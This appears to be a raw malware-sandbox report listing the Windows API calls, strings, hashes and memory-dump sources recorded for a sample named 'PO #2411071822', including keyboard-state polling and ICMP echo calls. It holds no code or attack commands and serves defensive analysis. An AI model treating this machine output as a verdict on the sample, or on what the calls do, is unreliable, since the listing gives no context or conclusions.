                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                              • API String ID: 1080873982-4153970271
                                                                                                              • Opcode ID: 1fd3131bc57a964c67ff14952b0cb0f9fcb821546194d76598ebe847153e2d3b
                                                                                                              • Instruction ID: c9dbc3ecab387d9594e93d703b231b4b035f4e1d33c34af01576e33c2ba4d8df
                                                                                                              • Opcode Fuzzy Hash: 1fd3131bc57a964c67ff14952b0cb0f9fcb821546194d76598ebe847153e2d3b
                                                                                                              • Instruction Fuzzy Hash: 4A21713290026ABFCF12AF91CC06FEE7B35BF19308F004566F505660E2EAB9A615DB55
                                                                                                              APIs
                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00427B42
                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00427B58
                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00427B69
                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00427B7B
                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00427B8C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: SendString
                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                              • API String ID: 890592661-1007645807
                                                                                                              • Opcode ID: e4cc78555426ed0992b08946061a58aa3635ff0b525aef6559b8048c8fba53d2
                                                                                                              • Instruction ID: c3d92c902a2dd3c7b253b2b2fa4caa66031a799658d76ab22c829527f5173e18
                                                                                                              • Opcode Fuzzy Hash: e4cc78555426ed0992b08946061a58aa3635ff0b525aef6559b8048c8fba53d2
                                                                                                              • Instruction Fuzzy Hash: 471108A0A501B979DB20B7A2DC4AEFF7E7CEBD2B04F1005667411A60C0DAA81E45C6B4
                                                                                                              APIs
                                                                                                              • timeGetTime.WINMM ref: 00427794
                                                                                                                • Part of subcall function 003FDC38: timeGetTime.WINMM(?,75A8B400,004558AB), ref: 003FDC3C
                                                                                                              • Sleep.KERNEL32(0000000A), ref: 004277C0
                                                                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004277E4
                                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00427806
                                                                                                              • SetActiveWindow.USER32 ref: 00427825
                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00427833
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00427852
                                                                                                              • Sleep.KERNEL32(000000FA), ref: 0042785D
                                                                                                              • IsWindow.USER32 ref: 00427869
                                                                                                              • EndDialog.USER32(00000000), ref: 0042787A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                              • String ID: BUTTON
                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                              • Opcode ID: fa9a771719a55a40c264ff48f6eeffcd9a69b113b04cf2e5b5ab968a518e10d6
                                                                                                              • Instruction ID: 5649146a899509660d0b0413ab4fab04e17e80b591bbec8f312168a2fd073354
                                                                                                              • Opcode Fuzzy Hash: fa9a771719a55a40c264ff48f6eeffcd9a69b113b04cf2e5b5ab968a518e10d6
                                                                                                              • Instruction Fuzzy Hash: 4E216570B08215AFE7015F21FC89B267F29F74634AB400136F50781261EBB95C01CB1E
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0043034B
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004303DE
                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 004303F2
                                                                                                              • CoCreateInstance.OLE32(0046DA8C,00000000,00000001,00493CF8,?), ref: 0043043E
                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004304AD
                                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00430505
                                                                                                              • _memset.LIBCMT ref: 00430542
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0043057E
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004305A1
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004305A8
                                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004305DF
                                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 004305E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1246142700-0
                                                                                                              • Opcode ID: 2fa1a8216cd9c53c28791a645c324d67e99b8903b89349608f558fa041b87446
                                                                                                              • Instruction ID: 284618c4664b57e5e9b577dc78c1d7ee8f359cd482684ea7d7bd29f711763f7e
                                                                                                              • Opcode Fuzzy Hash: 2fa1a8216cd9c53c28791a645c324d67e99b8903b89349608f558fa041b87446
                                                                                                              • Instruction Fuzzy Hash: 4BB1F874A00218AFDB04DFA5C898EAEBBB9FF48304F14856AF905EB251DB74ED41CB54
                                                                                                              APIs
                                                                                                              • GetKeyboardState.USER32(?), ref: 00422ED6
                                                                                                              • SetKeyboardState.USER32(?), ref: 00422F41
                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00422F61
                                                                                                              • GetKeyState.USER32(000000A0), ref: 00422F78
                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00422FA7
                                                                                                              • GetKeyState.USER32(000000A1), ref: 00422FB8
                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00422FE4
                                                                                                              • GetKeyState.USER32(00000011), ref: 00422FF2
                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0042301B
                                                                                                              • GetKeyState.USER32(00000012), ref: 00423029
                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00423052
                                                                                                              • GetKeyState.USER32(0000005B), ref: 00423060
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 0041ED1E
• GetWindowRect.USER32(00000000,?), ref: 0041ED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0041ED8E
• GetDlgItem.USER32(?,00000002), ref: 0041ED99
• GetWindowRect.USER32(00000000,?), ref: 0041EDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0041EE01
• GetDlgItem.USER32(?,000003E9), ref: 0041EE0F
• GetWindowRect.USER32(00000000,?), ref: 0041EE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0041EE63
• GetDlgItem.USER32(?,000003EA), ref: 0041EE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0041EE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 0041EE9B
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 003FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003FB759,?,00000000,?,?,?,?,003FB72B,00000000,?), ref: 003FBA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003FB72B), ref: 003FB7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 003FB88D
• DestroyAcceleratorTable.USER32(00000000), ref: 0045D8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 0045D8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 0045D8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003FB72B,00000000,?,?,003FB2EF,?,?), ref: 0045D90A
• DeleteObject.GDI32(00000000), ref: 0045D91C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
APIs
  • Part of subcall function 003FB526: GetWindowLongW.USER32(?,000000EB), ref: 003FB537
• GetSysColor.USER32(0000000F), ref: 003FB438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
APIs
• CharLowerBuffW.USER32(0047DC00,0047DC00,0047DC00), ref: 0042D7CE
• GetDriveTypeW.KERNEL32(?,00493A70,00000061), ref: 0042D898
• _wcscpy.LIBCMT ref: 0042D8C2
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
APIs
• __swprintf.LIBCMT ref: 003E93AB
• __itow.LIBCMT ref: 003E93DF
  • Part of subcall function 00401557: _xtow@16.LIBCMT ref: 00401578
Strings
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0044A259
• CreateCompatibleDC.GDI32(00000000), ref: 0044A260
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0044A273
• SelectObject.GDI32(00000000,00000000), ref: 0044A27B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A286
• DeleteDC.GDI32(00000000), ref: 0044A28F
• GetWindowLongW.USER32(?,000000EC), ref: 0044A299
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0044A2AD
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0044A2B9
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
APIs
Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                              • String ID: 0.0.0.0
                                                                                                              • API String ID: 2620052-3771769585
                                                                                                              • Opcode ID: 600f13c0eaa6684e1623885991c92d3d6b7205f060237d9522ac8083afdfa473
                                                                                                              • Instruction ID: 5036078bc1fcc409d0397ec2714a716afef85bfc0801a8a7da08b8722b7d0196
                                                                                                              • Opcode Fuzzy Hash: 600f13c0eaa6684e1623885991c92d3d6b7205f060237d9522ac8083afdfa473
                                                                                                              • Instruction Fuzzy Hash: 57112771E04124AFDF14AB71BD49EDA77ACDF00715F02007BF105A6080FFB89A81866A
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00405047
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • __gmtime64_s.LIBCMT ref: 004050E0
                                                                                                              • __gmtime64_s.LIBCMT ref: 00405116
                                                                                                              • __gmtime64_s.LIBCMT ref: 00405133
                                                                                                              • __allrem.LIBCMT ref: 00405189
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004051A5
                                                                                                              • __allrem.LIBCMT ref: 004051BC
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004051DA
                                                                                                              • __allrem.LIBCMT ref: 004051F1
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040520F
                                                                                                              • __invoke_watson.LIBCMT ref: 00405280
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 384356119-0
                                                                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                              • Instruction ID: e76e3ddcfdcfc81dc61db04f531464f5ed7de96c29df4a44a2b7c143129bdc75
                                                                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                              • Instruction Fuzzy Hash: 6571A471A01B16ABD714AA79CC41B9B73A9EF00768F14423FE510EA2C1E778D9408FD9
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00424DF8
                                                                                                              • GetMenuItemInfoW.USER32(004A1708,000000FF,00000000,00000030), ref: 00424E59
                                                                                                              • SetMenuItemInfoW.USER32(004A1708,00000004,00000000,00000030), ref: 00424E8F
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00424EA1
                                                                                                              • GetMenuItemCount.USER32(?), ref: 00424EE5
                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00424F01
                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00424F2B
                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00424F70
                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00424FB6
                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00424FCA
                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00424FEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4176008265-0
                                                                                                              • Opcode ID: 811d2c55f6e273e198f65b95e81e91e29d2d3625afc8352f188dfbc35b2c7576
                                                                                                              • Instruction ID: 578824054413e5b9722bd449152337f3623ae33454ebb53a880ced851350714b
                                                                                                              • Opcode Fuzzy Hash: 811d2c55f6e273e198f65b95e81e91e29d2d3625afc8352f188dfbc35b2c7576
                                                                                                              • Instruction Fuzzy Hash: 1D61B471B00269EFDB11CF64E984EAF7BB8FB85308F55005AF402A7291E7749D05CB29
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00449C98
                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00449C9B
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00449CBF
                                                                                                              • _memset.LIBCMT ref: 00449CD0
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00449CE2
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00449D5A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 830647256-0
                                                                                                              • Opcode ID: 7cdf4c1c9e88c3971c8d55bd10f93f9af59bbb1b937a093eee22ec54c10b06de
                                                                                                              • Instruction ID: e5363c0ebe5cbcf71fde32ebdeb700a263aa30f8d10989936220ae8216c41919
                                                                                                              • Opcode Fuzzy Hash: 7cdf4c1c9e88c3971c8d55bd10f93f9af59bbb1b937a093eee22ec54c10b06de
                                                                                                              • Instruction Fuzzy Hash: 35616EB5900208AFEB21DFA4CC81EEE77B8EF09714F14416AFA05E72A1D774AD42DB54
                                                                                                              APIs
                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004194FE
                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00419549
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0041955B
                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0041957B
                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004195BE
                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004195D2
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004195E7
                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 004195F4
                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004195FD
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041960F
                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0041961A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2706829360-0
                                                                                                              • Opcode ID: 2cac183f21d6688a78bb1c42696b33b57ede5664084da60cf3b9a1f09aa57fb0
                                                                                                              • Instruction ID: d7c978d2248d4c1ab81b40d2fb9ffa7ffeb72b4e400e35c945f31cf36fe9d754
                                                                                                              • Opcode Fuzzy Hash: 2cac183f21d6688a78bb1c42696b33b57ede5664084da60cf3b9a1f09aa57fb0
                                                                                                              • Instruction Fuzzy Hash: 63414F31E00219AFCB01DFA4DC549EEBB79FF08354F008066E502A7261EB74EE85CBA5
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?I$|?I
                                                                                                              • API String ID: 2862541840-463563548
                                                                                                              • Opcode ID: 05d34f1204ff9c5de54ca167754029feb91f7dd1409dedfa840cefd124c9b94f
                                                                                                              • Instruction ID: 6122c226e83ff200fa64489b5c357922bdc261926081098f7d9cd1690ba01bdb
                                                                                                              • Opcode Fuzzy Hash: 05d34f1204ff9c5de54ca167754029feb91f7dd1409dedfa840cefd124c9b94f
                                                                                                              • Instruction Fuzzy Hash: 8891A271E00219ABDF20CF95C844FAFBBB8EF49714F10915EF615AB280DB789941CBA4
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CoInitialize.OLE32 ref: 0043ADF6
                                                                                                              • CoUninitialize.OLE32 ref: 0043AE01
                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0046D8FC,?), ref: 0043AE61
                                                                                                              • IIDFromString.OLE32(?,?), ref: 0043AED4
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043AF6E
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0043AFCF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                              • API String ID: 834269672-1287834457
                                                                                                              • Opcode ID: 2c3c398cf9f0363e7af8d8284057f85f70e159eb536f319190f60acc2a5f84e3
• Instruction ID: aa0723f441fc411101b1007878f03898fa07d24f5cd48b628985c1f4827d241b
• Opcode Fuzzy Hash: 2c3c398cf9f0363e7af8d8284057f85f70e159eb536f319190f60acc2a5f84e3
• Instruction Fuzzy Hash: 0C61CA70648311AFC711EF54C849B6BBBE8AF88704F10051EF9859B291C778ED49CB9B
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00438168
• inet_addr.WSOCK32(?,?,?), ref: 004381AD
• gethostbyname.WSOCK32(?), ref: 004381B9
• IcmpCreateFile.IPHLPAPI ref: 004381C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00438237
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0043824D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 004382C2
• WSACleanup.WSOCK32 ref: 004382C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
